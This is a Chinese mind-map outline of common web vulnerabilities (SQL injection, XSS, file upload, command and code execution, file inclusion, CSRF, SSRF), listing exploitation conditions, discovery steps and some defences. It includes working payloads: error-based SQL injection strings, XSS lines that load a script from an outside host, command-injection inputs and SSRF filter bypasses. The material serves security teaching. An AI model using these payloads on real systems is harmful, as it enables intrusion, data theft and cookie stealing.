

首页  思维导图  详情



Web常见漏洞

2022-10-09 19:46:38   0  举报





AI智能生成

根据web漏洞常见类型，整理了漏洞的利用条件、挖掘方法、常用代码等

Web常见漏洞

漏洞利用方法

漏洞Payload

模版推荐

作者其他创作

大纲/内容

SQL注入

注入点查找

and1=1/and1=2(整型)

随机输入（整型）

-1/+1回显上下页（整型）

单引号（字符型整型）

and sleep(5)(判断页面返回时间)

注入分类

根据语法

可联合查询注入

前提

能使用union

页面必须有显示位

注入步骤

找到注入点并判断闭合字符

判断数据库类型

猜解列数，爆显示位

得到基本信息（如数据库名、数据库版本等）

清解表名

得到列名

得到列值

报错型注入

前提

页面没有显示位

源码使用了echo mysqlerror(输出了错误信息

注入速度快、语句复杂、不能使用group_.concat0,只能用limit依次清解

注入手法

?id=2'and (select 1 from (select count(*),concat(floor(rand(0)*2).(select (select 报错语句)from information_schema.tables limit0,1)x from

information_schema.tables group by )a )-

?id=2'and updatexml(1,concat(Ox7e,(SELECT @@version),0x7e),1)

?id=1+and extractvalue(1,concat(Ox7e,(select @@version),0x7e))

使用公式依次替换语句即可，后续步骤和union注入一样

布尔型注入

前提

页面存在注入但是没有显示位且源码没有使用echo mysql_error(输出错误信息

注入手法

?id=1and注入语句)-+根据返回结果是否相同来得到数据

主要利用了length0、asci0、substr0得到结果

基于时间延迟注入

根据页面返回时间的不同来得到数据

多语句查询

只在MSSQL数据库存在

一个SQL语句后跟分号后再跟一个语句即可执行两个语句

根据类型

整型

字符串型

搜索型

注入位置

GET

POST

X-Forwarded-For

User-Agent

XSS

危害

盗取管理员cookie

Xss蠕虫

挂马

网站重定向

修改网顶内容

攻击场景

各类SNS

邮件系统

BBS

微博

主要是一些大型社交网站

前提条件

反射型xss

一般是url参数中的值能回显到页面且url参数过滤不严

存储型xss

可以提交内容

提交的内容可被管理员或其他用户看到

提交的内容未被过滤或过滤不严

漏洞位置

在标签中<div>xss test</div>

在属性内<input type="text"name="content'"value="xss test'">

可以使用">xss test来测试

常见Payload

<img src="http://a.com/xss/1.js"/>

<img src=x onerror="s=createElement('script');body.appendChild(s);s.src='http://a.com/xss/probe.js'";>

XSS挖掘

手工检测

般先输入AAAA<>"&'()查看过滤了哪些字符

全自动XSS检测

APPSCAN、AWVS、Burp Suite、XSSER、XSSF

防御

过滤输入与输出

httponly

文件上传

常见可执行文件后缀：<br>php php2 php3 php5 phtml<br>asp aspx ascx ashx cer asa<br>jsp jspx

漏洞挖掘

找上传点，如头像、附件等的上传

找类似upload的脚本文件或目录

找编辑器目录

利用条件

首先，上传的文件可被执行

其次，用户在web可以访问到这个文件

最后，用户上传的文件未被压宿、格式化等改变内容

漏洞分类

配置不当直接getshell

本地上传被绕过

burp suite

服务端过滤被绕过

黑名单绕过

MIME绕过

截断上传

文件攻击

.htaccess

.user.ini

检测文件内容

文件幻数

00截断上传

文件解析漏洞

IIS解析漏洞

建立*.asp、*.asa格式的文件夹下的文件会以asp解析<br>

*.asp;1jpg会以asp解析

Apache解析漏洞

当Apache遇到不认识的扩展名时会依次向前解析，若都不认识测暴漏源码

Apache2.0.59|2.2.62.2.82.2.112.2.171有解析漏洞

Nginx解析漏洞

低版本的可在任意文件名后添加600.php进行解析

PHP CGI解析漏洞

前提条件：cgi,fix_pathinfo=1

IIS7/7.5中，a.com/x.txt/x.php的x.txt会被解析为php(在a.com/x.txt后添加x.php)

Nginxt也和IIS7一样，任意文件名任意文件名.php会被解析为php

开源编辑器上传漏洞

命令执行

利用条件

php中使用了ysytem、exec、shel_exec、passthru、popen、proc_popens等函数

用户可以控制函数中的参数

对用户参数未过滤或过滤不严

示例

system("$arg":/直接输入即可

system("bin/prog $arg"); //直接输入;ls

ystem("bin/prog -p $arg");//和上面一样

system("bin/prog -p=\"$arg\""); //可以输入";ls;"

system("bin/prog -p='$arg");/可以输入';ls;'

漏洞修复

少用执行命令的函数

参数值尽量用引号包括

对爹数过滤，对敏感字符进行过滤

代码执行

防御

不使用eval

对字符串进行转义

不使用preg_replacef的e修饰符，使用preg_replace_.callback替换

示例

www.xx.com/new/detail/id/{$_POST[xx]}}

漏洞挖掘

框架找漏洞

www.xx.com/news/show/id/124

漏洞利用点

执行代码的函数：eval、assert

callbackl函数：preg_replace + /e模式

反序列化(unserialize)

相关函数

php:eval、asert

python:exec

文件包含

函数

include

include once

require

require_once

利用条件

包含的文件中只要内容符合php规范，不管扩展名是什么都会被php解析，不符合php规范测暴漏源码

漏洞分类

本地包含

上传图片马然后包含

读敏感文件

包含日志getshell

包含伪协议

远程包含

要保证allow_url_fopen和allow_url_includej为On

防御

php中配置open_basedir

过滤./\

禁止服务器远程文件包含

CSRF

防御

二次确认

Tokeni认证

Referer

漏洞类型

GET

POST

利用场景

有意义的操作（如修改密码）

验证过于简单（参数固定、我们可以设置参数）

利用条件

知道u所有参数项并了解其含义

诱导用户访问构造好的POC

SSRF

条件

服务端提供了从其他服务器获取资源的功能

服务端为对目标地址做严格过滤

漏洞挖掘

从web功能上

通过ur分享内容

文件处理、编码处理、转码

在线番翻译

通过u地址加载与下载图片

阁片、文章的收藏

设置邮件接收服务器

从url关键字寻找

share、wap、url、link、src、source、target、u、3g、display、sourceurl、.imageurl、.domain等

漏洞验证

请求一张图片，看发起请求的是谁

绕过

http://A.com@10.10.10.10=10.10.10.10

IP使用其他进制：127.0.0.1=2130706433

使用短地址：http://10.10.116.11=http://t.cn/RwbLKDx

端口绕过：ip后面加个端口

xip.io

10.0.0.1.xip.i0=10.0.0.1

www.10.0.0.1.xip.io=10.0.0.1

mysite.10.0.0.1.xip.io=10.0.0.1

foo.bar.10.0.0.1.xip.io=10.0.0.1

js跳转

 Collect

Get Started

web功能

 Collect

Get Started

web

 Collect

Get Started

web端

 Collect

Get Started

web评价





0 条评论

下一页